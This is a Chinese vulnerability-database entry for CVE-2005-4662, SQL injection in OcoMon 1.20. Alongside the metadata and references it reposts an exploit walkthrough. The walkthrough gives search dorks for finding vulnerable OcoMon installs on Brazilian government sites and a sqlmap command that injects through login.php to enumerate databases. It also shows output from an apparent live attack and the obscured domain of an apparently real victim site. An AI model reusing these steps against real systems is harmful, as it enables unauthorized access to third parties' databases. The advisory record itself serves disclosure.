OcoMon多个未明SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196599 漏洞类型 SQL注入
发布时间 2005-12-31 更新时间 2006-01-17
CVE编号 CVE-2005-4662 CNNVD-ID CNNVD-200512-802
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2016110106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-802
|漏洞详情
OcoMon1.20以及可能的更早的版本存在多个SQL注入漏洞,远程攻击者可通过在未明输入表单中的未知攻击向量来执行任意SQL命令。
|漏洞EXP
~ OCOMON Sql Injection Vulnerable: ~

%[JonatasFil DKR]%

- OCOMON are vulnerable to Bypass Sqli,
{https://cxsecurity.com/issue/WLB-2016080175}
- And recently discovered a method of doing sqli injection via post using sqlmap.
------------------------------------------------------
[+] Vuln Directory: /ocomon/includes/common/login.php
------------------------------------------------------

- Ok, First you have to find out if the site has the file login.php and it is vuln.

------------------------------------------------------------------------------------
[+] Dork:inurl:"ocomon" site:gov.br
[+] Dork:inurl:"ocomon" site:br
-----------------------------------------------------

- After finding a site with the system vulnerable:

-----------------------
[+] Download Sqlmap:
[+] http://sqlmap.org/
-----------------------

- and go exploit.

------------------------------------------------------------------------------------
[XPL] "sqlmap -u http://www.{site}/ocomon/includes/common/login.php --data"=login=" --dbs --random-agent"
-------------------------------------------------------------------------------------

- After that just list the tables.

-------------------------
available databases [7]:
[*] emater
[*] forum
[*] information_schema
[*] mysql
[*] ocomon_rc6
[*] phpmyadmin
[*] wordpress
---------------------------

[+] DEMO: wwXw.emaXter.pXa.goXv.bXr


~ Enjoy :D
|参考资料

来源:XF
名称:ocomon-sql-injection(23085)
链接:http://xforce.iss.net/xforce/xfdb/23085
来源:OSVDB
名称:20751
链接:http://www.osvdb.org/20751
来源:SECUNIA
名称:17470
链接:http://secunia.com/advisories/17470
来源:BID
名称:15386
链接:http://www.securityfocus.com/bid/15386
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=369163
来源:MISC
链接:http://sourceforge.net/project/showfiles.php?group_id=45554